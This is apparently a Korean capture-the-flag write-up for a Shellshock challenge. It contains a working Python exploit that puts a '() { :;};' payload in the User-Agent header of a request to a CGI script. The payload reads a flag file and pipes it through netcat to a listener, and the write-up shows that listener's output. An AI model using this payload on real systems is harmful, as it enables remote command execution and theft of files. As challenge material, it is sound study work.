제공되는 주소는 오직 cgi주소 밖에 없으므로 cve임을 의심 해 볼 수 있다.
힌트로 제공된 "Toddler's Bottle"을 통해 shellshock임을 유추 할 수 있었다.
h3x0r@ip-172-31-17-183:~$ nc -l -v -p 44444 Listening on [0.0.0.0] (family 0, port 44444) Connection from [127.0.0.1] port 44444 [tcp/*] accepted (family 2, sport 35474) 1Ts_Sora_Shock h3x0r@ip-172-31-17-183:~$ |
root@ip-172-31-17-183:~/*****# cat ./sheshe.py #!/usr/bin/python import urllib2 target = 'http://52.199.49.117/cgi-bin/sheshe.cgi' UAgent = '() { :;};/bin/cat /home/sheshe/flag | /bin/nc localhost 44444' #UAgent = 'abd' req = urllib2.Request(target) req.add_header("User-agent",UAgent) try: urllib2.urlopen(req) except: print "[+] Success" root@ip-172-31-17-183:~/*****# ./sheshe.py [+] Success root@ip-172-31-17-183:~/*****# |